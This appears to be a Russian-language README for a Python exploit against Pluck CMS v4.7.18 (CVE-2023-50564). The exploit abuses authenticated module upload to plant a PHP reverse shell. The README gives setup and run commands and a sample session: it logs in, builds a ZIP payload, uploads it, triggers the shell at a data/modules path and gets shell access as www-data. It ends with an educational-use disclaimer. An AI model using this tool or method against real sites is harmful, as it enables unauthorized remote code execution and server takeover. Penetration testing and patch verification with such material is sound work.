
Этот скрипт использует функцию загрузки файлов в Pluck CMS v4.7.18 для загрузки вредоносного PHP-файла, обеспечивая удаленный доступ через обратную оболочку. После загрузки этот бэкдор предоставляет атакующему доступ к серверу с правами веб-сервера, позволяя выполнять дальнейшие действия в системе или сети.
Этот скрипт эксплуатирует аутентифицированную уязвимость произвольной загрузки файлов в Pluck CMS v4.7.18 (CVE-2023-50564). Используя эту уязвимость, аутентифицированный злоумышленник может загрузить вредоносный PHP-файл, что позволяет выполнить произвольный код (в данном случае — обратную оболочку).
Уязвимость существует в конечной точке /admin.php?action=installmodule, которая позволяет аутентифицированному пользователю загружать ZIP-файл, содержащий произвольные файлы. Загружая вредоносный PHP-файл, этот эксплойт устанавливает обратную оболочку обратно к атакующему.
pip install requestspip install requests-toolbeltЭтот скрипт также требует действительный логин для экземпляра Pluck CMS, включая URL цели и пароль.
su, sudo -l) и позволяет пользователю ввести данные вручную.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
Запустите эксплойт с помощью Python:
python3 exploit.py
Shell> для взаимодействия с целевой системой.Пример:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
Этот скрипт предназначен для образовательных целей и этичного хакинга. Он должен использоваться только в средах, где у вас есть явное разрешение на тестирование. Автор не несет ответственности за любое неправомерное использование данного инструмента.
Этот проект лицензирован по лицензии MIT — подробнее см. MIT License.
Не стесняйтесь форкать репозиторий и отправлять pull request. По любым вопросам или запросам функций, пожалуйста, откройте issue на GitHub.